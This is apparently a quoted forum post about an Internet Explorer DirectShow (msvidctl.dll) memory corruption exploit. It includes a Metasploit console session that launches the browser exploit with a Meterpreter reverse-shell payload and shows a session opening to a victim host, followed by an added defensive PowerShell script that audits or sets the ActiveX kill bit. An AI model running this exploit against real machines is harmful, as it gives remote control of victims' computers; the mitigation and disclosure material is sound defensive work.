Originally Posted by Jabra
There is a new IE exploit that has been recently released into the wild. The exploit is for DirectShow (msvidctl.dll) MPEG-2. The exploit utilizes an ActiveX control in addition to a GIF file include, to perform a memory corruption attack. The vulnerability affects users of both IE 6 and IE 7.
Today, the exploit was added to the Metasploit framework by HD Moore (the author of Metasploit). The module was written by Trancer and was posted at http://www.rec-sec.com/2009/07/06/ms-directshow-msvidctl-exploit/.
Thus far, I have verified the exploit to be working on IE 7. Since the exploit works by using an ActiveX control, the victim will need to allow the ActiveX control to run.
=[ msf v3.3-dev
+ -- --=[ 384 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 162 aux
msf > use windows/browser/msvidctl_mpeg2
msf exploit(msvidctl_mpeg2) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(msvidctl_mpeg2) > set LHOST 192.168.1.50
LHOST => 192.168.1.50
msf exploit(msvidctl_mpeg2) > set LPORT 443
LPORT => 443
msf exploit(msvidctl_mpeg2) > set URIPATH /test.html
URIPATH => /test.html
msf exploit(msvidctl_mpeg2) > set SRVPORT 9000
SRVPORT => 9000
msf exploit(msvidctl_mpeg2) > exploit
[*] Exploit running as background job.
msf exploit(msvidctl_mpeg2) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:9000/test.html
[*] Local IP: http://192.168.1.50:9000/test.html
[*] Server started.
[*] Sending HTML to 192.168.1.100:1091…
[*] Sending exploit to 192.168.1.100:1091…
[*] Sending GIF to 192.168.1.100:1091…
[*] Transmitting intermediate stager for over-sized stage…(216 bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened (192.168.1.50:443 -> 192.168.1.100:1092)
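The post notes that the victim's browser has to let the ActiveX control load. The defensive check a practitioner wants on the endpoint side is whether Internet Explorer's "kill bit" is set for that control, which stops it from loading at all regardless of any prompt. The script below is an added example written for this page; it is not part of the original post and not code from the Metasploit project or the module author. It checks (and, with -Set, sets) the kill bit in the registry key IE consults for ActiveX compatibility, in both the native hive and the Wow6432Node hive that 32-bit IE reads on 64-bit Windows. The CLSID supplied as the default is an assumption: it is the one this editor associates with the msvidctl.dll Video control, so verify it against Microsoft's advisory for that control (which kill-bits a longer list of CLSIDs) and pass the full list with -Clsid rather than relying on the single default.

```powershell
# Added example (not from the original post or the Metasploit project):
# reports whether the IE kill bit is set for one or more ActiveX CLSIDs, and
# optionally sets it. The default CLSID is an ASSUMPTION for the msvidctl.dll
# Video control; confirm it (and the rest of the list) against Microsoft's
# advisory before deploying. Setting the bit requires an elevated shell.
param(
    [string[]]$Clsid = @('{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}'),
    [switch]$Set
)

# IE treats bit 0x400 of "Compatibility Flags" as "never load this control".
$KillBit = 0x400

# Both hives matter on 64-bit Windows: 32-bit IE reads the Wow6432Node copy.
$Hives = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Get-KillBitState {
    param([string]$Id, [string]$Hive)
    $key = Join-Path $Hive $Id
    if (-not (Test-Path $key)) { return $null }      # no entry at all: control may load
    $flags = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $flags) { return $null }           # key exists but no flags value
    return [bool]($flags -band $KillBit)
}

function Set-KillBit {
    param([string]$Id, [string]$Hive)
    $key = Join-Path $Hive $Id
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    $cur = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $cur) { $cur = 0 }
    # Preserve any compatibility flags already present; only OR in the kill bit.
    New-ItemProperty -Path $key -Name 'Compatibility Flags' -PropertyType DWord `
        -Value ($cur -bor $KillBit) -Force | Out-Null
}

foreach ($id in $Clsid) {
    foreach ($hive in $Hives) {
        # The Wow6432Node branch does not exist on 32-bit Windows; skip it there.
        if (-not (Test-Path $hive)) { continue }
        if ($Set) { Set-KillBit -Id $id -Hive $hive }
        $state = Get-KillBitState -Id $id -Hive $hive
        [pscustomobject]@{
            CLSID      = $id
            Hive       = $hive
            KillBitSet = if ($null -eq $state) { $false } else { $state }
            Note       = if ($null -eq $state) { 'no Compatibility Flags entry: control can load' } else { '' }
        }
    }
}
```

Run it without arguments to audit a host, or with `-Set` from an elevated prompt to apply the kill bit; a control that reports `KillBitSet = False` in either hive can still be instantiated by the matching IE bitness, which is exactly the condition the module above relies on.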